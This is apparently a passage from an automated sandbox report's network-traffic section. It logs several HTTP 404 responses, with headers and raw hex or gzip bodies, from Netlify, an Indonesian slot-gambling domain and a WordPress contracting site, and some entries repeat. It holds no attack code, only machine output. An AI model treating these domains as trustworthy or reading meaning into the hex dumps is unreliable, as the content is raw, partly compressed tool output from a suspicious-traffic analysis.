74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 05 Nov 2024 14:36:15 GMTServer: NetlifyX-Nf-Request-Id: 01JBYC2ER0S7X9JQPQV0N533C2Connection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Tue, 05 Nov 2024 14:36:17 GMTServer: NetlifyX-Nf-Request-Id: 01JBYC2HAE3FKS9CP1QGCY05CRConnection: closeTransfer-Encoding: chunkedData Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c 20 31 31 30 2c 20 31 31 35 29 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 3a 23 44 33 32 32 35 34 3b 2d 2d 63 6f 6c 6f 72 42 67 43 61 72 64 3a 23 66 66 66 3b 2d 2d 63 6f 6c 6f 72 53 68 61 64 6f 77 3a 23 30 65 31 65 32 35 31 66 3b 2d 2d 63 6f 6c 6f 72 45 72 72 6f 72 54 65 78 74 3a 72 67 62 28 31 34 32 2c 20 31 31 2c 20 34 38 29 3b 2d 2d 63 6f 6c 6f 72 43 61 72 64 54 69 74 6c 65 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 3a 23 32 32 32 3b 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 3a 23 46 35 46 35 46 35 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20 73 79 6d 62 6f 6c 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 34 33 38 33 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 68 31 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 6d 61 69 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 77 69 64 74 68 3a 31 30 30 76 77
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW7nlen7HPIvQqGTE2%2FHmR2ObGDhzVOqzSU6bAtsN1OvXDoX03OtbTVuNnZ2NnUICTJZGUje1ZZujj2d%2FARVz4jN5TFWiS2dTcuIgCGnBPhy7jOvksIGGVpcc3sIzj%2BCP4e%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddd94db683442e2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103319&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 30 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 69 74 65 6d 61 70 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 73 69 74 65 6d 61 70 2e 78 6d 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 54 50 20 53 4c 4f 54 4f 38 39 20 46 Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO89 F
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:28 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:31 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:37:34 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 69 93 e4 c6 91 20 fa 99 6d f6 fe 03 98 34 b2 2b c9 04 12 f7 51 d5 d5 12 59 24 25 ce 36 45 99 9a 92 de 4a 4d 2b 43 02 c8 2a 74 23 13 29 20 b3 0e 96 ea c3 68 24 ad 56 fb 7e c5 ee ce 8a c3 37 1a 99 46 6f 76 4c fb 4b aa ff cd 73 f7 c0 7d 25 f2 e8 6e 72 d4 4d 56 15 10 f0 f0 70 f7 f0 f0 70 8f f3 c1 9b 1f 7e 76 f2 f9 7f fe e1 47 dc f9 72 16 3c bc f7 00 ff 70 ae 1f 1d 0f a2 65 30 e0 02 7b 7e 76 3c b0 a3 01 b7 88 bc a9 7f 75 3c 08 cf 0e 01 76 b9 88 0f c7 e3 f0 6c 21 cc bc f1 3c 7e 6b 80 59 3d db 7d 78 ef 8d 07 33 6f 69 73 ce b9 1d c5 de f2 78 f0 e3 cf 3f e6 cd 01 37 ce be cc ed 99 77 3c b8 f0 bd cb 45 18 2d 07 9c 13 ce 97 de 1c 20 2f 7d 77 79 7e ec 7a 17 be e3 f1 f4 32 e2 fc b9 bf f4 ed 80 8f 1d 3b f0 8e 25 c2 73 ef 8d 37 1e bc c9 f3 dc fb 41 00 df b9 cf e6 1e f7 f8 a3 cf 38 55 30 04 55 90 38 9e b3 fd 30 f6 42 c1 09 67 1c cf 3f fc bf 10 7e e9 2f 03 ef e1 83 31 fb 8b 29 05 5a a2 70 12 2e e3 02 25 f3 d0 9f bb de 15 a3 ba 04 7a e6 cd bd c8 5e 86 51 01 ba 42 c7 c1 fb 9f 7c 06 7f 87 29 41 29 96 d8 89 fc c5 92 5b 5e 2f 00 8f bd 58 04 be 63 2f fd 70 3e 0e dc f7 9e c6 e1 1c 30 06 76 1c c3 37 22 1f 58 3e f7 66 f6 00 f3 be 71 33 f8 2e 15 77 b5 1c 1c 0e 98 f4 9f 8c 9f 8c 19 88 10 46 67 83 d1 e0 bb 67 91 bd 38 1f 1c fe 1c 80 b1 10 80 fc 20 82 2a 71 a2 d5 6c f2 c8 8f 97 08 e3 bb 25 04 f6 64 65 07 3e 8f b8 23 db 59 fa f3 33 c1 8e 96 4f c6 d7 cb f9 b3 27 e3 b7 26 59 fe 80 e5 f7 97 de 0c 51 7d 14 78 33 e0 bd 54 18 a6 7f 02 df 37 28 e6 ad 20 cf b3 08 63 1f c5 31 38 94 46 03 14 36 60 78 b2 12 75 d9 c0 df aa 8a bf 15 89 52 74 4a b1 29 45 c9 9f 65 2b a1 b0 57 d9 00 3b 07 79 7e d2 17 3e 11 49 46 f1 ed 68 27 d6 ab e8 8a 02 90 4b 02 50 ec 02 bb 12 47 2f 1a fd 36 89 6b a7 f0 3c 45 3c 11 b4 a0 70 15 f7 e6 ac c0 d3 17 45 ae 3e 8b ce ec b9 ff 25 29 e9 26 95 1a 96 f3 15 eb 92 6a 4b 36 19 c5 c4 8a 62 e5 d5 ab da 5c e1 45 2d 70 2a 17 34 c1 cc bf b2 14 d9 86 52 5c 8f b5 2f 12 20 15 a6 ea 79 d6 24 93 c6 e5 e5 cb 76 ae 51 6a 51 8b 18 5d 45 b5 93 a7 f9 e7 04 d4 2c a8 a3 91 a3 13 9d b6 cc 46 21 5d ef 93 ad c6 a6 62 b4 80 16 db 40 91 a4 44 76 05 b2 9b ca 51 0a 28 b4 02 79 ad 84 39 39 79 8a 52 10 68 49 26 d3 62 6e b3 26 44 b5 8e d6 a3 dc 05 de 37 c9 9d 94 ea 55 99 4f 70 30 25 53 e4 b6 b2 0b 32 60 52 96 dd 42 6e b5 ae 2f 45 c9 6a 35 7c ec 73 42 78 a1 ca Data Ascii: i m4+QY$%6EJM+C*t#) h$V~7FovLKs}%nrMVpp~vGr<pe0{~v<u<vl!
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:37:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 